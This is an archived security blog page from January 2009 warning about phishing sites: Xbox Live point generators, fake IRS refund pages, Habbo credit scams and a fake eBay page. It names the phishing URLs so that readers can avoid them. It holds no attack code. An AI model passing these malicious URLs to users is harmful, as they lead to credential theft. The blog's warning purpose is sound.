Phish: January 2009 Archives

How Old?

| | Comments (1)
This XBox Live phish attempt caught my eye:

flu0.gif
Click to Enlarge

It's a lot better looking than many of the others I see, and the phisher took the time to make a fake screenshot to impress you with all the fake money he (doesn't) have. The most interesting thing about it for me is that it references another domain ("Runeflux.com"). Usually they're pretty anonymous.

Anyway, I decided to check out the domain - there's nothing there, could it have been taken down? Well, a quick search later and we have this (rather well edited) Youtube video. Apparently the domain simply hosted the same phishing page, so yes - it's a fair bet someone had it taken offline.

The important part is when you check out the profile of the person who owns the account:


flu3.gif

Yes, our phishing friend is only 14. I've had quite a bit of experience researching people at the younger end of the age spectrum involved in this sort of thing, and I have to say the basic mechanics of "how to phish" are all in place with this kid.....slick websites, Youtube promotion, little touches like fake screenshots....it's all there.

Worrying, isn't it?

Anyway, the URL to avoid here is

h1.ripway.com/microsoftpointsgen/
There seem to be quite a few sites online at present claiming they can give you "online tax refunds", if only you fill in your bank details and click "submit". It's not a good idea, and they look pretty convincing:


irs1.gif
Click to Enlarge

irs2.gif
Click to Enlarge

Some of these domains have been up and down since last night, but I expect some of them will return again so here they are in full:

gicrisis.org/data/refundtax/SearchTAXERR.php

irs-2009.com/refund/refunds.html

collectrefund-irs.com/refund/refunds.html

cimaonline.ca/application/Internal/Revenue/Service/pas.php?certegy_vm=trueportlet_change_1_actionOverrideFchaseonlineFchangeFprocessDetails_windowLabel_portlet_process_pageLabel_page_process

jklabs.cz/phpayv2/admin/import/.secure/www.irs.gov/get-refund/refunds.php?Where_is_my_refund&Get_Refund
....not really.

fhc1.png
Click to Enlarge

The above is an absolutely hideous phish. Someone clearly needs to hire a real designer from all that stolen Habbo money they must have by now. I think the "Free Habbo Credits" thing was supposed to be clickable (hence the "Proof!" bit), but they seem to have messed that up.

Doh.

The URL to avoid here is

habmanny.tripod.com/id7.html
We've heard reports of a couple of these websites currently doing the rounds - they call themselves "Microsoft Points Heaven", and usually sit on free hosting domains. They promise you "free" Microsoft points, then ask you to enter your Live login details. At that point, your data has been stolen.

mph1.jpg
Click to Enlarge

If you check the code, you can see you're not "signing in to XBox Live" at all - you're entering your information into a standard submission form, which will send the information you enter directly to the site owner.

wfrm.jpg

The last URL we saw this scam residing at was

microsoftpointheaven.weebly.com

which is now offline. It will no doubt resurface somewhere else, so be on your guard...
Wow, this is creepy.

It's an EBay phish page that does two things.

fakeebay1.jpg
Click to Enlarge

The first is that it bizarrely asks you to install a Firefox extension called QIP (as you can see from the yellow bar across the top in the above screenshot), which (as far as I'm aware) is a legitimate Russian extension that allows you to converse with friends across multiple platforms.

fakeebay2.jpg

Call me crazy, but I'm sure most EBay users would immediately think something was wrong if they were presented with a Russian Firefox extension on EBay.

Worse is to come, however. If the end-user should scroll down a little, they're presented with adverts - and they don't exactly convince you that this is the real EBay website. One usually contains a naked woman of some sort. The other? Well, it tends to show a close up of a randomly selected dead womans face, often horribly mutilated.

Yes, I have no idea what's going on here either.

ebayfake3.jpg

 
ebayfake4.jpg

Now I've seen a lot of strange things on EBay. Fake laptops, XBox scams, cash on delivery con-jobs and hacktool packs. However, naked women and dead bodies probably takes first prize (at least it would if this was the real site). Thanks for freaking me out, insane Russian phisher.

In case you're wondering, the adverts all seem to take you to some kind of Russian linkdump, where none of the images relate to the site you're going to end up at. Russian Roulette is indeed the name of the game where that's concerned.

The site to avoid like the plague here is

sadww.sadas.nm.ru/abasdass.htm
(Automatically translated from Italian):

hhack1.jpg
Click to Enlarge

...sadly, as crude as it is you'd be surprised how many people will fall for the old "Send your login to a random Hotmail address" gag. The domain to avoid is

habbohack2.blogspot.com

Pages

About this Archive

This page is a archive of entries in the Phish category from January 2009.

Phish: December 2008 is the previous archive.

Phish: February 2009 is the next archive.

Find recent content on the main index or look in the archives to find all content.